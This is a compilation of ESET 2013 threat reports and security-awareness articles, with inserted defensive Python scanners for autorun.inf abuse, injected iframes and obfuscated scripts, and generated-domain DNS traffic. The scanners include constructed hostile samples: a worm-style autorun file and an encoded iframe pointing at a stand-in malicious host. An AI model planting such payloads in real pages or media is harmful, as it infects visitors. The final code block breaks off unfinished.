While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

8. Win32/Ramnit

Previous Ranking: 8
Percentage Detected: 1.43%

Win32/Ramnit is a file infector: a virus that executes at every system start. It infects DLL and EXE files and also searches for HTM and HTML files in which to write malicious instructions. It exploits a vulnerability in the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files, or shut down or restart the computer.

9. Win32/Qhost

Previous Ranking: 9
Percentage Detected: 1.23%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

10. Win32/Virut

Previous Ranking: 10
Percentage Detected: 0.98%

Win32/Virut is a polymorphic file infector. It affects files with EXE and SCR extensions by appending itself to the last section of the file. Additionally, it searches for HTM, PHP and ASP files and adds a malicious iframe to them. The virus connects to an IRC network and can be controlled remotely.


TLDs, Phishing, Business Security and Education

David Harley CITP FBCS CISSP ESET Senior Research Fellow

Recently we were asked about the security implications of the new wave of professional Top Level Domains (TLDs), notably .bank. This isn’t an issue I’ve really given much thought to: I only work seven days a week. But it seems to me that the central issue with gTLDs (generic TLDs) like .bank as opposed to specific brand TLDs like .barclays is how much trust you can place in the bona fides of a domain.

Some thought has been put into reducing the risk of trademark infringement and avoiding cybersquatting with brand TLDs, and that has an indirect benefit to the user because it makes phishing somewhat less likely. However, once the domain is approved and launched, how safe it is depends on the good intent and security awareness of the domain holder.

Very heavy use has been made in recent years of subdomains under TLDs such as .co.cc and .tk to host malicious URLs, as well as TLDs whose core business is to provide subdomains (or sub-subdomains) under their own *.com domain. There’s potential here for an expansion of such malicious activity, and I for one am not going to rush to click on any links in any email I receive from {mybank}.bank, let alone such gifts to typosquatting as .comm.

There’s recently been a revitalized discussion on Twitter about the much-heralded death of anti-virus. I’ve been hearing this since about 1994, so it must be going to happen soon. Well, Larry Bridwell and I will be discussing the demise of the industry that pays my bills at the AVAR conference in December, so I won’t devote a lot of space to that issue now, but one of the interesting facets of that Twitter thread came out of a blog by Blaze in which he suggests that there is a blame attribution model where various stakeholders – AV vendors, other security vendors, Microsoft, and other application vendors – attribute some blame to one or more of the other players, but all blame the end user.

I agree, that’s kind of close to a ‘blame the victim’ culture like the one that old-school virus writers and new age cybercriminals are both apt to subscribe to. Kurt Wismer points out though that “at the end of the day, no one is expecting the attackers to collectively vanish, so improving things is going to require changes on the part of other players as well, including the users.” Improving user awareness across the board – particularly for home users – is a bigger job than I can do justice to in a short article, but how about in the business world? As it happens, that’s something else we were asked about recently…

Every kind of business generates and stores data that is potentially of interest to cyber criminals, and even the smallest business should assess how valuable or sensitive its data really is, by performing a formal security audit if appropriate. Businesses of any size are also subject to national data protection laws and need to be aware of these and of the penalties for non-compliance.

As part of their risk analysis, businesses (irrespective of their size) need to consider the impact of a security breach on the business, thinking about who or what would be affected and whether the business could continue to trade if a breach was successful. Once it has a clear view of the risks it can then decide how to communicate network security policies to its staff.

The first step is to make sure staff are aware of the risks from cyber-criminals. Although cybercrooks are sometimes very cunning and sophisticated, their impact can be drastically reduced by some simple preventative measures and education. Good user education is a filter, not a flood: you can’t educate effectively by hitting people with ‘everything they need to know about security’ in one massive hit. It’s an ongoing process that focuses on essentials, teaches the user to extrapolate from one example scenario to others, and reinforces core messages over the whole period that the staff member works for the company.

It’s essential to create a culture of security awareness where all staff, regardless of level and role, take it for granted that they are part of the solution.

For cyber security efforts to be as successful as they should be, everyone needs to know and understand what the organisation’s cyber security policies are, how to comply with them through proper use of controls, why compliance is important and the possible consequences of failure to comply (to the company and to the individual).

The goal should be the creation of a “security-aware workforce”: not a workforce comprised entirely of security gurus, but one where employees are empowered to report risky practices to management. Staff training sessions should make employees aware of such things as email safety, password usage, safe mobile use and the importance of data protection, and of an Acceptable Use Policy (AUP) for all staff, including approved web and social media usage. Policies, controls and security education should also take into account data-sharing relationships with partners, vendors and clients. An authoritarian approach to security enforcement with draconian penalties won’t suit every environment, but employers should spell out that a breach of security can be very bad news for business and threaten its continued operation. If there are specific disciplinary consequences, they need to be clearly documented so that staff are in no doubt as to their existence.

Education is not a one-time, one-shot process. People forget what they don’t use, and have to be reminded and even re-trained. People are better at complying with policies when they understand the rationale behind them. Even assuming that they intend to comply, they’re likelier to remember to comply if they understand why they should do X and shouldn’t do Y.

Since education is an on-going process, HR can play an important role in ensuring that everyone receives suitable and consistent training in the form most appropriate to their role. IT and HR need to liaise to ensure that people have appropriate training and system privilege levels as they enter the organisation and change roles, and to ensure that they don’t retain inappropriate access once they leave.

Monthly Threat Report: August 2013

[Chart: Top 10 threats, ESET LiveGrid, August 2013]

The Top Ten Threats

1. HTML/Iframe

Previous Ranking: 5
Percentage Detected: 4.26%

Type of infiltration: Virus
HTML/Iframe.B is a generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL hosting malicious software.

2. Win32/Bundpil

Previous Ranking: 1
Percentage Detected: 3.45%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains a URL from which it tries to download several files over HTTP; the downloaded files are then executed. The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

3. HTML/ScrInject

Previous Ranking: 2
Percentage Detected: 2.59%

Generic detection of HTML web pages containing obfuscated scripts or iframe tags that automatically redirect to a malware download.

4. Win32/Sality

Previous Ranking: 4
Percentage Detected: 2.08%

Sality is a polymorphic file infector. When run, it starts a service and creates/deletes registry keys related to security activities on the system, so that the malicious process starts on each reboot of the operating system.
It modifies EXE and SCR files and disables services and processes related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

5. INF/Autorun

Previous Ranking: 3
Percentage Detected: 2.06%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While use of this mechanism makes the malware easy to spot for a scanner that applies this heuristic, it’s better to disable the Autorun function by default than to rely on antivirus to detect it in every case.

6. Win32/Conficker

Previous Ranking: 7
Percentage Detected: 1.62%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

7. Win32/Dorkbot

Previous Ranking: 7
Percentage Detected: 1.52%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor and can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites, then attempts to send the gathered information to a remote machine.

8. Win32/Ramnit

Previous Ranking: 9
Percentage Detected: 1.35%

Win32/Ramnit is a file infector: a virus that executes on every system start. It infects DLL and EXE files and also searches HTM and HTML files to write malicious instructions into them. It exploits a vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.

9. Win32/Qhost

Previous Ranking: 10
Percentage Detected: 1.15%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

10. Win32/Virut

Previous Ranking: n/a
Percentage Detected: 0.95%

Win32/Virut is a polymorphic file infector. It affects files with EXE and SCR extensions by appending itself to the last section of the file. Additionally, it searches for HTM, PHP and ASP files and adds a malicious iframe to them. The virus connects to an IRC network and can be controlled remotely.

 

PC Support Scams: still keeping us amused

David Harley CITP FBCS CISSP ESET Senior Research Fellow

A version of this article previously appeared on the Chainmailcheck hoax/scam blog.

It’s been a while since I picked up the phone and found myself talking to a support scammer. That may be in part because I’m less likely to pick up a call that is flagged as ‘International’, ‘Withheld’ or ‘Unknown number’. But when I do pick up a suspiciously anonymous call, it’s usually a different kind of scam, PPI reclaim voice spam (mostly automated), and so on.

I haven’t missed it a bit. So when I got a phone call and someone with a hard-to-parse Asiatic accent came on the line and started a familiar spiel, it was never likely that I was going to play along for any length of time. Life is too short.

The spiel, by the way, opens something like this, in my experience. Your mileage may vary.

“Am I speaking [or 'Can I speak to'] to Mr Jones?”

In this case, as in most of the support scams I get, the fact that I wasn’t the person the scammer was expecting made no difference at all, though he did apologize profusely for getting my name wrong. Sometimes, though, the scammer will go to some length to tell you who you are and where you live, no doubt so that you will believe them when they tell you that they know that your PC is having problems (or causing them for someone else). However, if they manage to get your details right, that only really means that they’ve managed to check them in a directory.

Actually, the name they usually use when they call me isn’t Jones, and I sometimes get calls that appear to be legitimate asking for the same person, so I guess there is a wrong entry on a directory or customer lead list somewhere. My rule of thumb is that if the caller apologizes for bothering me and rings off, it’s probably a legitimate call that neither of us have any interest in. Though if the intended call was a sales call, that might raise a question as to whether they’d checked that the number was registered with the UK’s Telephone Preference Service, a “do not call” list. Still, if they thought they were dealing with a customer, it’s a grey area, at worst.

On this latest occasion, though, the scammer didn’t go into the ‘you are leaking viruses onto the entire Internet’ spiel: instead, having ascertained that I actually had a computer, he started to tell me about computer errors and how they were worse than viruses because anti-virus software doesn’t detect them. As he didn’t seem deterred by my bursting into laughter, I told him that I’m a security researcher specializing in exposing support scams. As he didn’t seem to know what a support scam is, I started to explain it to him, but he rang off. So I don’t know exactly where he was going: no doubt he was going to ‘prove’ to me – perhaps with Event Viewer or ASSOC – that my system was at risk. But while I’m always interested in the latest scammer ploys, sometimes you just don’t want to waste a Friday evening scammer baiting. Still, it seems that this is not an unusual approach: this, for instance, was a recent comment to one of my earlier blogs:

“…Said they were getting errors from my machine and my hard drive was corrupted. He prompted me to look at the event viewer, where I scrolled down and came to the first error which I tried to relate to him but he said that is all he needs and the error proves that my machine is infected. I have a good virus program and a good malware program I told him, but he said that the malware was undetectable.”

Other recent comments showed that some people are still getting a certain amount of amusement out of yanking the chains of these wretched people. One of them interrupted their spiel by coming over all Anonymous:

We are Anonymous
We are one we are Many
We do not forgive
We do not forget
Expect US….

It amused me, too. I can’t guarantee that this will work in all cases, though.

Another told us:

“I did a quick search on Google for CLSID and found many examples of what a CLSID should look like. I quoted one of them to her and she freaked out because obviously I’m infected. So, I pretended to freak out too. I started screaming for my husband and quoting scripture. Having a blast by now. I kept yelling ‘save me Jesus!’ over and over. Then I begged her to please, please help me. What in the world am I to do? Poor helpless me!”

And finished off by telling the scammer in no uncertain terms what to expect if their paths crossed. Scary.

If you’re not familiar with this class of cold-call scam, here’s a paper a quartet of us (Martijn Grooten of Virus Bulletin, Steve Burn of Malwarebytes, my former colleague Craig Johnston and myself) presented at Virus Bulletin last year. It’s pretty comprehensive: My PC has 32,539 errors: how telephone support scams really work.

Other papers and blogs written or part-written by ESET researchers:

Education as Data Defense

Stephen Cobb, CISSP
Senior Security Researcher, ESET North America

One possible consequence of an information security failure is the compromise of personal information known as a data breach. Each year, the Ponemon Institute tracks the total cost of data breaches based on a broad sample of companies, then calculates the average cost per capita (or person exposed). The latest figure: $136 per record. That’s a global average, up from $130 in the previous year’s study (based on incidents at 277 companies in 9 countries, the May 2013 report was sponsored by Symantec).

Clearly, digital information systems that handle confidential personal data are crucial to much of what we do today, either as consumers or business people, and failure to protect those systems can have costly consequences. (Bear in mind that the Ponemon research found organizations in Germany and the U.S. experienced significantly higher costs, $199 and $188 respectively). Nevertheless, many people still seem to think we can keep these systems secure, always available, and always accurate, without providing the people who use them with relevant security training. That’s like thinking we can have a safe and reliable transportation system without well-trained mechanics and properly licensed vehicle operators.

Last year, ESET conducted two surveys in America to better understand this phenomenon of cybersecurity under-education. We asked employed Americans if they had ever received computer security training of any kind from their employer. Only 32% said they had. In a second study, we asked a different group of Americans if they had ever taken any classes or training related to protecting their computer and/or personal information. For 68% of respondents, the answer was never. In other words, we can assume that less than a third of the workforce has any cyber security training at all.

This is a serious problem and Verizon’s 2013 Data Breach Investigation Report speaks to this problem: The difficulty level of unauthorized intrusions into systems was rated as “low” in 78% of cases. Of course, the reality of a workforce under-educated in the realm of data defense is not news to criminals and other bad actors intent on abusing information technology for their own ends. They already know that employees are often the weakest link in an organization’s information security.

As long as high tech security measures can be beaten by low tech attacks that exploit human weaknesses—such as inadequate knowledge and understanding—our data and systems will remain at risk of serious compromise. If your organization needs to be persuaded to spend money on security awareness and training try sharing this calculation: 7,500 customer records exposed at a cost of $136 per record = more than $1 million.

When you consider that equation, spending money on information security training and awareness makes a lot of sense, on the organizational level and within society as a whole. After all, data breaches are not a rare occurrence these days. One reason for this is the underground market in stolen data that is now thriving. Yet some organizations still don’t realize that the personally identifiable information stored in their systems, be it customer records or employee records or data managed for a third party, is a target for cyber criminals.

Right now, the burden for security training falls mainly on companies, with some help from organizations like Security Our eCity and Ciber Seguridad. However, in the future your organization could be spared some of these costs if your country was committed to teaching cybersecurity hygiene to everyone, from an early age. We have not yet seen that kind of commitment in America, but that does not mean it is not possible. For example, in Estonia they have made cybersecurity training part of elementary-level school curriculum and they are working on expanding the program into preschool. Clearly, the time to invest in computer security training for employees is now, both at work and in our schools.

Monthly Threat Report: July 2013

[Chart: Top 10 threats, ESET LiveGrid, July 2013]

The Top Ten Threats

1. Win32/Bundpil

Previous Ranking: 1
Percentage Detected: 3.78%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains a URL from which it tries to download several files over HTTP; the downloaded files are then executed. The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

2. HTML/ScrInject

Previous Ranking: 2
Percentage Detected: 2.30%

Generic detection of HTML web pages containing obfuscated scripts or iframe tags that automatically redirect to a malware download.

3. INF/Autorun

Previous Ranking: 3
Percentage Detected: 2.23%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While use of this mechanism makes the malware easy to spot for a scanner that applies this heuristic, it’s better to disable the Autorun function by default than to rely on antivirus to detect it in every case.
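The INF/Autorun entries in both the August and July reports above describe the mechanism (a program named in autorun.inf runs when the medium is opened) without showing what a heuristic reviewer of such a file actually looks at. The following is an added example, not ESET code and not their heuristic: it parses the [autorun] section, lists every directive that would launch a program, and reports indicators that ordinary install media do not need. The three sample files, the "constructed-payload.exe" name and the thresholds are all constructed for this example.

```python
"""Heuristic review of an autorun.inf file (added example, not ESET code)."""
import re
from pathlib import PureWindowsPath

# Directives that run a program directly; shell\<verb>\command entries are
# matched by pattern in launch_targets().
LAUNCH_KEYS = ("open", "shellexecute")
# File types Windows executes directly from such a directive.
EXEC_EXT = {".exe", ".com", ".bat", ".cmd", ".vbs", ".pif", ".scr", ".js", ".wsf"}


def parse_autorun(text: str) -> dict:
    """Return {key: value} for the [autorun] section, keys lower-cased.
    Written by hand rather than with configparser so that junk lines, odd
    casing and repeated keys do not abort parsing; on a repeated key the
    last value wins, which is also how Windows reads the file."""
    directives = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line.startswith((";", "#")):
            continue
        m = re.match(r"\[(.+?)\]$", line)
        if m:
            in_autorun = m.group(1).strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            directives[key.strip().lower()] = value.strip()
    return directives


def _program(value: str) -> str:
    """First token of a command line with quotes removed (arguments dropped)."""
    value = value.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        return value[1:end] if end > 0 else value[1:]
    return value.split()[0] if value else ""


def launch_targets(directives: dict) -> dict:
    """Map every directive that launches a program to the program it runs."""
    targets = {}
    for key, value in directives.items():
        if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            prog = _program(value)
            if prog:
                targets[key] = prog
    return targets


def assess(text: str) -> list:
    """Return human-readable indicators; an empty list means none found.
    The indicators are this example's own heuristics (assumption), not ESET's."""
    directives = parse_autorun(text)
    targets = launch_targets(directives)
    reasons = []
    for key, prog in targets.items():
        if PureWindowsPath(prog).suffix.lower() in EXEC_EXT:
            reasons.append(f"{key} launches executable {prog}")
    # Double-click, Explore and the context menu all wired to one program:
    # install media normally use a single open= line.
    if len(targets) >= 2 and len({p.lower() for p in targets.values()}) == 1:
        reasons.append("several verbs hijacked to the same program")
    # AutoPlay entry text imitating the built-in "Open folder to view files"
    # choice while a program launch is configured.
    action = directives.get("action", "").lower()
    if targets and action.startswith("open folder"):
        reasons.append("AutoPlay action text imitates the folder-open entry")
    return reasons


# Constructed samples (not real files).
ICON_ONLY = """[autorun]
icon=drive.ico
label=Backup Drive
"""

INSTALL_MEDIA = """[autorun]
open=setup.exe
icon=setup.exe,0
label=Product Installer
"""

WORM_STYLE = r"""[AutoRun]
;junk line to confuse naive parsers
open=RECYCLER\constructed-payload.exe
shellexecute=RECYCLER\constructed-payload.exe
shell\open\command=RECYCLER\constructed-payload.exe
shell\explore\command=RECYCLER\constructed-payload.exe
shell=open
action=Open folder to view files
icon=%SystemRoot%\system32\shell32.dll,4
useautoplay=1
"""

if __name__ == "__main__":
    for name, sample in (("icon only", ICON_ONLY), ("install media", INSTALL_MEDIA),
                         ("worm style", WORM_STYLE)):
        print(name, "->", assess(sample) or ["no indicators"])
```

The installer sample is reported too, with a single indicator: on removable media any autorun-triggered program launch is worth a look, which is exactly why the article recommends switching the feature off rather than trusting detection alone. On a Windows host the policy value that does that is NoDriveTypeAutoRun (REG_DWORD 0xFF disables it for all drive types) under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer.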

4. Win32/Sality

Previous Ranking: 5
Percentage Detected: 2.18%

Sality is a polymorphic file infector. When run, it starts a service and creates/deletes registry keys related to security activities on the system, so that the malicious process starts on each reboot of the operating system.
It modifies EXE and SCR files and disables services and processes related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

5. HTML/Iframe

Previous Ranking: 6
Percentage Detected: 2.04%

Type of infiltration: Virus
HTML/Iframe.B is a generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL hosting malicious software.
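The HTML/Iframe and HTML/ScrInject entries (in both the July and August reports above, and the iframes that file infectors such as Ramnit and Virut write into .htm files) describe the same shape of injected content: a frame the visitor cannot see that pulls in another site, or a script that decodes itself at run time. The following is an added example, not ESET code and not a signature: a static scan that flags hidden or one-pixel iframes and scripts combining several decoding markers. The two sample pages, the "malicious.invalid" host (a reserved TLD) and the thresholds are constructed for this example; a real scanner also emulates the script, which this does not.

```python
"""Static scan for injected iframes and self-decoding scripts (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-script markers typical of injected loaders. Each is legitimate
# JavaScript on its own, so a script is reported only when several co-occur.
SCRIPT_MARKERS = ("eval(", "unescape(", "document.write(", "fromCharCode(")
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)
# 20+ consecutive %xx or \xNN escapes: a string being decoded at run time.
LONG_ESCAPED = re.compile(r"(?:%[0-9a-f]{2}){20,}|(?:\\x[0-9a-f]{2}){20,}", re.I)
MIN_SCRIPT_REASONS = 2


class _Collector(HTMLParser):
    """Collects iframe attribute dicts and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._script_buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
        elif tag == "script":
            self._script_buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)


def _is_tiny(value: str) -> bool:
    """True for a width/height of 0 or 1 (in pixels or any unit)."""
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


def scan_html(html: str, page_host: str) -> list:
    """Return findings as dicts {kind, src|snippet, reasons}.
    page_host is the host the page was served from: a hidden frame pulling
    content from a different host is the classic drive-by redirect shape."""
    collector = _Collector()
    collector.feed(html)
    collector.close()
    findings = []
    for attrs in collector.iframes:
        reasons = []
        if _is_tiny(attrs.get("width", "")) or _is_tiny(attrs.get("height", "")):
            reasons.append("zero/one-pixel frame")
        if HIDDEN_STYLE.search(attrs.get("style", "")):
            reasons.append("hidden via CSS")
        src_host = urlparse(attrs.get("src", "")).hostname
        if reasons and src_host and src_host.lower() != page_host.lower():
            reasons.append(f"loads third-party host {src_host}")
        if reasons:
            findings.append({"kind": "iframe", "src": attrs.get("src", ""), "reasons": reasons})
    for body in collector.scripts:
        reasons = [m for m in SCRIPT_MARKERS if m in body]
        if LONG_ESCAPED.search(body):
            reasons.append("long escaped string")
        if len(reasons) >= MIN_SCRIPT_REASONS:
            findings.append({"kind": "script", "snippet": body.strip()[:60], "reasons": reasons})
    return findings


# Constructed pages, not captured from any real site.
CLEAN_PAGE = """<html><body><h1>Hello</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<script>document.write("<p>built " + new Date() + "</p>");</script>
</body></html>"""

# The escaped string decodes to <iframe src="http://malicious.invalid"> (constructed).
INJECTED_PAGE = """<html><body><h1>Hello</h1>
<iframe src="http://malicious.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%61%6C%69%63%69%6F%75%73%2E%69%6E%76%61%6C%69%64%22%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, "->", scan_html(page, "www.example.com") or "no findings")
```

The clean page keeps a visible video embed and a script that merely calls document.write, and produces no findings; the injected page yields one iframe finding with three reasons and one script finding. Requiring two or more script markers is what keeps ordinary document.write usage out of the results.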

6. Win32/Dorkbot

Previous Ranking: 7
Percentage Detected: 1.75%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor and can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites, then attempts to send the gathered information to a remote machine.

7. Win32/Conficker

Previous Ranking: 8
Percentage Detected: 1.71%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

8. JS/Chromex.FBook

Previous Ranking: n/a
Percentage Detected: 1.55%

JS/Chromex.FBook is a trojan that posts messages to user profiles on Facebook. Depending on the variant, the threat may be a malicious Google Chrome or Mozilla Firefox extension/plugin.

9. Win32/Ramnit

Previous Ranking: 9
Percentage Detected: 1.41%

Win32/Ramnit is a file infector: a virus that executes on every system start. It infects DLL and EXE files and also searches HTM and HTML files to write malicious instructions into them. It exploits a vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.

10. Win32/Qhost

Previous Ranking: 10
Percentage Detected: 1.26%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.
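The Conficker entry above notes that the worm contacts servers under pre-computed domain names, and the Qhost entry that it talks to its command and control server over DNS. Both leave a trace in the resolver log rather than on the infected host, so the following added example (not ESET's telemetry or detection logic) aggregates a resolver log per client and flags clients that receive NXDOMAIN answers for many distinct random-looking names, the signature of a host walking through generated domains until one resolves. The log format ("time client qname rcode"), the sample lines and the thresholds are this example's own assumptions; the domain names in the sample are constructed.

```python
"""Per-client DNS log heuristic for generated-domain churn (added example)."""
import math
from collections import defaultdict

# Flag a client that received NXDOMAIN for at least this many distinct
# second-level labels whose mean character entropy is at least this high.
MIN_DISTINCT_NXDOMAIN = 8
MIN_MEAN_ENTROPY = 3.0


def entropy(label: str) -> float:
    """Shannon entropy in bits per character of one DNS label."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def second_level_label(qname: str) -> str:
    """Label directly under the TLD (naive: co.uk-style suffixes are not special-cased)."""
    labels = qname.lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def analyze(log_text: str) -> dict:
    """Aggregate "<time> <client> <qname> <rcode>" lines into per-client
    statistics plus a flag; malformed lines are skipped."""
    stats = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        _, client, qname, rcode = parts
        s = stats.setdefault(client, {"queries": 0, "nxdomain": 0, "nx_slds": set()})
        s["queries"] += 1
        if rcode.upper() == "NXDOMAIN":
            s["nxdomain"] += 1
            s["nx_slds"].add(second_level_label(qname))
    report = {}
    for client, s in stats.items():
        slds = s["nx_slds"]
        mean_ent = sum(entropy(x) for x in slds) / len(slds) if slds else 0.0
        report[client] = {
            "queries": s["queries"],
            "nxdomain": s["nxdomain"],
            "distinct_nxdomain_slds": len(slds),
            "mean_nx_entropy": round(mean_ent, 2),
            "flag": len(slds) >= MIN_DISTINCT_NXDOMAIN and mean_ent >= MIN_MEAN_ENTROPY,
        }
    return report


def flagged_clients(log_text: str) -> list:
    """Sorted list of clients whose statistics cross both thresholds."""
    return sorted(c for c, r in analyze(log_text).items() if r["flag"])


# Constructed log lines (no real hosts or traffic). 10.0.0.5 behaves normally;
# 10.0.0.9 imitates a client trying generated names until the last one resolves.
SAMPLE_LOG = """\
2013-08-01T10:00:01 10.0.0.5 www.example.com NOERROR
2013-08-01T10:00:02 10.0.0.5 mail.example.com NOERROR
2013-08-01T10:00:03 10.0.0.5 update.microsoft.com NOERROR
2013-08-01T10:00:04 10.0.0.5 nonexistent.example.com NXDOMAIN
2013-08-01T10:00:05 10.0.0.9 www.example.com NOERROR
2013-08-01T10:00:06 10.0.0.9 qlxzvkwrbt.biz NXDOMAIN
2013-08-01T10:00:07 10.0.0.9 mdfpyhgucs.info NXDOMAIN
2013-08-01T10:00:08 10.0.0.9 zkvqxlbtwn.org NXDOMAIN
2013-08-01T10:00:09 10.0.0.9 pbgryhdmfc.net NXDOMAIN
2013-08-01T10:00:10 10.0.0.9 wtkxzvqlnb.ws NXDOMAIN
2013-08-01T10:00:11 10.0.0.9 hgsdcfymup.biz NXDOMAIN
2013-08-01T10:00:12 10.0.0.9 xrtvbkzwlq.info NXDOMAIN
2013-08-01T10:00:13 10.0.0.9 jnfdgphcsy.org NXDOMAIN
2013-08-01T10:00:14 10.0.0.9 kvlxbqztwr.net NXDOMAIN
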